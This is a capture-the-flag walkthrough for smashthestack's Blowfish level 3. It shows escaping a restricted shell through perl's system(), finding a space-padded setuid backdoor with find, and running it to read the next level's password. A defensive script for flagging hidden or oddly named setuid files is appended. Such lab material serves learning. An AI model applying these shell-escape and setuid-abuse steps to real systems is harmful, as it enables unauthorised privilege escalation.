Smashthestack.org: Blowfish Level 3

16 Feb 2013

We are now logging in as level3 on blowfish.smashthestack.org. When we enter, we see that we are in a restricted environment and have to try to break out. There aren't a lot of commands we can use, so I tabbed to see which were available and which might help us break out of the shell.

So I tabbed twice and got these possible commands to execute:

:         builtin   done      fg        let       set       typeset
!         caller    echo      fi        local     shift     ulimit
./        case      elif      for       logout    shopt     umask
[         cd        else      function  perl      source    unalias
[[        command   enable    getopts   popd      suspend   unset
]]        compgen   esac      hash      printf    test      until
{         complete  eval      help      pushd     then      wait
}         continue  exec      history   pwd       time      while
alias     declare   exit      if        read      times
bg        dirs      export    in        readonly  trap
bind      disown    false     jobs      return    true
break     do        fc        kill      select    type

As you can see, we have perl at our service, which makes a great candidate to start executing system commands. I first tried using backticks, but this didn't work; I haven't got a clue why. Then I tried to execute the command used in level 2 with system:

perl -e "system('/usr/bin/find / -perm -4000');"

This returned:

/usr/bin/find: `/root': Permission denied
/usr/bin/find: `/var/cache/ldconfig': Permission denied
/usr/bin/find: `/var/spool/cron/crontabs': Permission denied
/var/local/.      level4_backdoor
/var/opt/.level3_backdoor
/usr/bin/find: `/home': Permission denied
/usr/bin/find: `/proc': Permission denied
/usr/bin/find: `/etc': Permission denied
/levels/level13
/levels/level11
/levels/level12
/levels/level4
/levels/level7
/levels/level8
/levels/level10
/levels/level5
/levels/level9
/levels/level6
/usr/bin/find: `/boot': Permission denied
/usr/bin/find: `/tmp': Permission denied
/bin/su

We see the

/var/local/.      level4_backdoor

which has spaces in its name. We need to escape the spaces, so I executed the same perl command with the path to the binary and the spaces escaped:

perl -e "system('/var/local/.\ \ \ \ \ \ level4_backdoor');"

We get a shell, YAY. So all that's left is to do:

sh-3.2$ cat /pass/level4
n3xt_l3v3l!

Off to level 4.
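
Seen from the defender's side, the find listing above is also where a hidden setuid file gives itself away. The script below is an added example, not part of the original write-up: it triages a setuid listing and flags dot-prefixed names, whitespace in names, and files outside the usual binary directories. The TRUSTED_DIRS list and the function names are assumptions made for this illustration, and the sample input is a subset of the paths from the listing above.

```shell
#!/bin/sh
# Added example: triage a setuid listing, one path per line, such as the
# stdout of `find / -perm -4000`. Prints each suspicious path with reasons.
# Assumption: TRUSTED_DIRS is where this host's packages install setuid
# programs; extend it (e.g. with /levels on a wargame box) per system.
TRUSTED_DIRS=${TRUSTED_DIRS:-"/bin /sbin /usr/bin /usr/sbin /usr/lib /usr/libexec"}

flag_suspicious_suid() {
    while IFS= read -r path; do      # IFS= and -r keep spaces and backslashes
        [ -n "$path" ] || continue
        base=${path##*/}
        dir=${path%/*}
        reasons=""
        case $base in                # dot-prefixed names are hidden from plain ls
            .*) reasons="hidden-name" ;;
        esac
        case $base in                # padding a name with blanks misleads listings
            *[[:space:]]*) reasons="${reasons:+$reasons,}whitespace-in-name" ;;
        esac
        trusted=no
        for t in $TRUSTED_DIRS; do
            case $dir/ in
                "$t"/*) trusted=yes ;;
            esac
        done
        [ "$trusted" = yes ] || reasons="${reasons:+$reasons,}outside-trusted-dirs"
        [ -z "$reasons" ] || printf '%s\t%s\n' "$path" "$reasons"
    done
}

# Sample input: a subset of the paths from the find output in this write-up.
sample_listing() {
    cat <<'EOF'
/var/local/.      level4_backdoor
/var/opt/.level3_backdoor
/levels/level4
/levels/level5
/bin/su
EOF
}

sample_listing | flag_suspicious_suid
```

On a real host, feed it the stdout of the find command and compare the flagged paths against the package manager's file list.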